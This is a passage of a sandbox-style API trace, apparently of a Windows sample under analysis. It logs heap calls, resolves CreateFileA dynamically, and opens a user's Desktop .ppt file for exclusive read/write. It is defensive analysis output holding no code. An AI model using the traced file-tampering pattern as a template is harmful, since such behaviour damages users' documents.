lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.785] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.785] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0029.786] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.786] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.786] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.787] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.788] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd90 [0029.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.788] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.789] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0029.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.789] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0029.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0029.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x32) returned 0x7c2080 [0029.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", cchWideChar=50, lpMultiByteStr=0x7c2080, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpUsedDefaultChar=0x0) returned 50 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.790] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\auomeuf.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0029.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64) returned 0x7c10a8 [0029.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=50, lpWideCharStr=0x7c10a8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt") returned 50 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0029.790] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.790] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.791] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.791] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0029.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0029.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0029.792] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.792] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 